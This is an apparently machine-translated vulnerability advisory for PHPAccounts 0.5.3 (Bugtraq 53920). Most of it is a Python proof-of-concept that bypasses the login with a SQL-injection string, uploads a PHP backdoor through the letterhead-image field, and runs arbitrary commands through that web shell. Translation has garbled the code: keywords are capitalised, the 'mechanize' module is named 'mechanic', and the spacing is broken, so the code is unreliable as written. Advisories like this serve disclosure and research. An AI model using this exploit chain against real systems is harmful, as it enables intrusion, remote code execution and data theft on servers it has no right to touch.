PHPAccounts SQL injection and Arbitrary File Upload Vulnerability

Release date:
Updated on:

Affected Systems:
Phpaccounts
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53920

PHPAccounts is a simple Web-based account application for small businesses, freelancers, and consulting companies.

PHPAccounts has the SQL injection vulnerability and Arbitrary File Upload Vulnerability. These vulnerabilities are derived from data provided by unverified users. Attackers can exploit this vulnerability to manipulate applications, execute arbitrary code, access or modify data, or exploit these vulnerabilities in the underlying database.

<* Source: loneferret
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python

Import re, mechanic
Import urllib, sys

Print "\ n [*] phpAcounts v.0.5.3 Remote Code Execution"
Print "[*] Vulnerability discovered by loneferret"

Print "[*] Offensive Security-http://www.offensive-security.com \ n"
If (len (sys. argv )! = 3 ):
Print "[*] Usage: poc. py <RHOST> <RCMD>"
Exit (0)

Rhost = sys. argv [1]
Rcmd = sys. argv [2]

Print "[*] Bypassing Login ."
Try:
Br = mechanic. Browser ()
Br. open ("http: // % s/phpaccounts/index. php? Frameset = true "% rhost)
Assert br. viewing_html ()
Br. select_form (name = "loginForm ")
Br. select_form (nr = 0)
Br. form ['login _ username'] = "x 'or '1 '#"
Br. form ['login _ password'] = "pwnd"
Print "[*] Triggering SQLi .."
Br. submit ()
Except t:
Print "[*] Oups... Something happened"
Exit (0)

Print "[*] Uploading Shell ..."
Try:
Br. open ("http: // % s/phpaccounts/index. php? Page = tasks & action = preferences "% rhost)
Assert br. viewing_html ()
Br. select_form (nr = 0)
Br. form ["Preferences [LETTER_HEADER]"] = 'test'
Br. form. add_file (open ('backdoor. php'), "text/plain", "backdoor. php", name = "letterhead_image ")
Br. submit (nr = 2)
Except t:
Print "[*] Upload didn't work"
Exit (0)

Print "[*] Command Executed \ n"
Try:
Shell = urllib. urlopen ("http: // % s/phpaccounts/users/1/backdoor. php? Cmd = % s "% (rhost, rcmd ))
Print shell. read ()
Except t:
Print "[*] Oups ."
Exit (0)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Phpaccounts
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://phpaccounts.com/